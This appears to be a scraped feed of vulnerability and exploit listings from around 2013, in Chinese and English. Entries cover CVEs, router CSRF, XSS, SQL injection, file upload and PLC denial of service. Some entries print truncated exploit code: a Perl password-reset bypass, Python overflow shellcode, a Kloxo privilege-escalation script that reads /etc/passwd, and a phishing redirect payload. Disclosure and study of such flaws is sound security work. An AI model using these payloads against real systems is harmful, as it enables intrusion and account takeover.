destoon 后门漏洞

No description provided by source...

FlashChat Arbitrary File Upload

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 "FlashChat Arbitra...

CVE-2013-1439

The "faster LJPEG decoder" in libraw 0.13.x, 0.14.x, and 0.15.x before 0.15.4 allows context-dependent attackers to cause a denial of service NULL pointer dereference via a crafted photo file...

Router ONO Hitron CDE-30364 - CSRF Vulnerability

Exploit for hardware platform in category web applications Exploit Title: Router ONO Hitron CDE-30364 - CSRF Vulnerability Date: 14-9-2013 Exploit Author: Matias Mingorance Svensson - matias.msatowasp.org Vendor Homepage:...

Router ONO Hitron CDE-30364 - Cross-Site Request Forgery

Router ONO Hitron CDE-30364 - Cross-Site Request Forgery Exploit Title: Router ONO Hitron CDE-30364 - CSRF Vulnerability Date: 14-9-2013 Exploit Author: Matias Mingorance Svensson - matias.msatowasp.org Vendor Homepage:...

金蝶一个反射xss可全国钓鱼

简要描述： 无意简单发现的。 详细说明： 一开始就发现，本来觉得没危害的。但是看见所有城市的金蝶都有，果断发了。 说说我怎么发现的吧。 首先随便进入一个地址，如:binhai.kingdee.com 然后看见框框果断注入，无果。 然后正常输入的时候，看见这个。 按照经验，我闭合了title，于是效果就来了。 漏洞证明： binhai.kingdee.com/search/result.html?Submit=搜索&keyword=location.href="//www.eisoft.cc" 更好的利用方法，请自行想象。 .kingdee.com/search/result.html /...

CVE-2013-4339

WordPress before 3.6.1 does not properly validate URLs before use in an HTTP redirect, which allows remote attackers to bypass intended redirection restrictions via a crafted string...

Schneider Electric PLC ETY Series Ethernet Controller - Denial of Service

Telnet server of Schenider Electric ETY Series Controllers have a security problem. We noticed that while we are connected to the PLC through telnet, if we call telnet instance inside VxWorks again it can cause the device to crash. The telnet instance name is tTelnetd which you can see in the...

SocialEngine 4.5 Shell Upload Vulnerability

SocialEngine version 4.5 suffers from a remote shell upload vulnerability. + INTRODUCTION ------------------------------------------------------------- The plugin has the objective give you a better visual for the user profile, allowed the addition of cover image keeping the layout closest to the...

StarUML - 'WinGraphviz.dll' ActiveX Buffer Overflow

Exploit Title: StarUML WinGraphviz.dll ActiveX buffer overflow vulnerability Date: 03.8.2013 Exploit Author: d3b4g Vendor Homepage:http://staruml.sourceforge.net/en/ Software Link: http://staruml.sourceforge.net/en/ Tested on: Windows XP SP3 About StarUML -------------- StarUML is an open source...

Broadkam PJ871 - Authentication Bypass

Broadkam PJ871 - Authentication Bypass !/usr/bin/perl d3c0der use HTTP::Request; use LWP::UserAgent; print "= Target : "; $ip=; chomp $ip; print "= new password : "; $npass=; chomp $npass; if $ip ! /^http:/ $ip = 'http://' . $ip; if $ip ! //$/ $ip = $ip . '/'; print "\n"; print "-attacking , plz...

struts 2.3.15 命令执行漏洞

No description provided by source...

CVE-2013-4787

creationtimestamp| type| source ---|---|--- 2013-07-03 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/38627 2025-08-31 03:01:11+00:00| seen| MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d 2025-08-31 03:12:49+00:00| seen| MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57...

shopex最新版前台一处想不到的SQL注入

简要描述： shopex代码核心的地方都做了加密处理，找漏洞就需要一点想象空间了，比如这个SQL注入... 详细说明： 存在于用户注册想不到的位置吧？ 1. /core/shop/controller/ctl.passport.php 267行 if !$info = $account-create$POST,$message ... 2.看到1，想到有没有可能$account-create是foreach $POST构造sql语句的呐？ 3.看数据表结构： 果断提交时$POST里加入memberid测试其实测试时我还试了mobile等，嘿，只捡有用的字段说，然后就有了下图： 漏洞证明：...

phpEventCalendar 0.2.3 - Multiple Vulnerabilities

phpEventCalendar v.0.2.3 Multiple Vulnerabilities ==================================================================== .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [email protected] , [email protected] .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.phpcodeworks.com/pec/download...

PT-2013-41: Arbitrary Code Execution in Ajax File and Image Manager

The specialists of the Positive Research center have detected "Arbitrary Code Execution" vulnerability in Ajax File and Image Manager. Due to incorrect application architecture, validation of file extension is implemented after uploading file. Uploaded file will subsequently be removed if its...

Medium: kernel

Issue Overview: Heap-based buffer overflow in the tg3readvpd function in drivers/net/ethernet/broadcom/tg3.c in the Linux kernel before 3.8.6 allows physically proximate attackers to cause a denial of service system crash or possibly execute arbitrary code via crafted firmware that specifies a lo...

phpcms 2 0 0 7 onunload. inc. php page to an update-type implant is attached using the EXP-bug warning-the black bar safety net

Download a set of phpcms 2 0 0 7 analysis, in the module\movie\onunload. inc. php found a update type of injection. query"UPDATE ". TABLEMOVIESERVER." SET num = num-1 WHERE serverid = $serverid AND num 0 "; ? $serverid is not any filtering and also not enclosed in single quotation marks, so ignor...

Intrasrv Simple Web Server 1.0 SEH based Remote Code Execution BOF

Exploit for windows platform in category remote exploits !/usr/bin/python import socket import os import sys target="192.168.1.16" W00T egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + "\x90"94...

Kloxo 6.1.6 - Local Privilege Escalation

Exploit for linux platform in category local exploits LXLABS=cat /etc/passwd | grep lxlabs | cut -d: -f3 export MUID=$LXLABS export GID=$LXLABS export TARGET=/bin/sh export CHECKGID=0 export NONRESIDENT=1 echo "unset HISTFILE HISTSAVE PROMPTCOMMAND TMOUT" /tmp/w00trc echo "/usr/sbin/lxrestart...